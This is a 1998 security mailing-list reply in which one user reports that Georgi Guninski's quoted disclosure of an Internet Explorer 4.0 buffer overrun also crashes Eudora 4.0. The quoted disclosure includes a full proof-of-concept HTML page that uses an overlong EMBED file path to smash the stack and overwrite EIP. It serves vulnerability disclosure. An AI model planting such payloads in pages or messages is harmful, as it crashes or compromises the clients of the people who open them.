Re: MSIE buffer overrun

Christian Holmqvist (pt95cho@STUDENT.HK-R.SE)
Fri, 20 Mar 1998 17:13:10 +0100

On Fri, 20 Mar 1998, Georgi Guninski wrote:
Hi!

This not only crashes MSIE4 but also Eudora4.0 (yes the mail reader...)
I can't read this mail with out a crash. I had to read it in pine on a
unix system.

Cheers Christian

> Microsoft Internet Explorer 4.0 (don't know for other versions)
> can be crashed and eventually made execute arbitrary code
> with a little help of the <EMBED> tag.
>
> The following:
> <EMBED SRC=file://C|/A.ABOUT_200_CHARACTERS_HERE___________________>
> opens a dialog box and closes IE 4.0.
> It seems that the long file extension causes stack overrun.
>
> The stack is smashed - full with our values, EIP is also ours and CS=SS.
> So probably a string could be constructed, executing code at the
> client's machine.
>
> Solution: Do not browse hostile pages.
> To try this: http://www.geocities.com/ResearchTriangle/1711/msie.html
>
>
> Georgi Guninski
> http://www.geocities.com/ResearchTriangle/1711
>
> -----------------------cut here and save as
> crashmsie.html---------------------
> <HTML>
> Trying to crash IE 4.0
> <EMBED
> SRC=file://C|/A.012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789>
> 40
> 80 160 170 180 190 200
> </HTML>
>

Mvh Christian

/~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\
| Christian Holmqvist |
| Email: pt95cho@student.hk-r.se |
| Tele: 0457-17754 |
\________________________________/